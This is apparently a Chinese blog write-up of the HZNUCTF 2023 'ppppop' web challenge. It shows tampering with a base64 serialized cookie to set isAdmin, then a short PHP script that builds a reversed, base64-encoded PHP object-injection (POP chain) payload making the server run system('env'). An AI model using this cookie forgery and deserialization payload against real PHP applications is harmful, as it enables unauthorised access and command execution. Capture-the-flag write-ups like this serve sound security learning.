[HZNUCTF 2023 preliminary]ppppop

ha0cker

于 2023-04-22 13:40:36 发布

阅读量537

点赞数

文章标签： java html 开发语言 web安全

本文链接：https://blog.youkuaiyun.com/m0_70819573/article/details/130303884

版权

文章讲述了在PHP环境中，通过解密base64编码的usercookie并修改权限，可以触发classA到classB的pop链构造，最终调用system函数获取系统环境变量。提供了一个代码示例来展示这种攻击方式。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1.代开环境，发现一片空白。

通过抓包可以发现base64加密的user cookie

base64解密后得到序列化的字符串：O:4:"User":1:{s:7:"isAdmin";b:0;}

将零改为一后可以显示源码了

很简单的pop链构造，class A __destruct()->class B __call()

<?php

class A {
    public $className="B";
    public $funcName="system";
    public $args="env";

    
}

class B {
   
}
$a = new A();
echo base64_encode(strrev(serialize($a)));
?>

通过payloadpost传参获得flag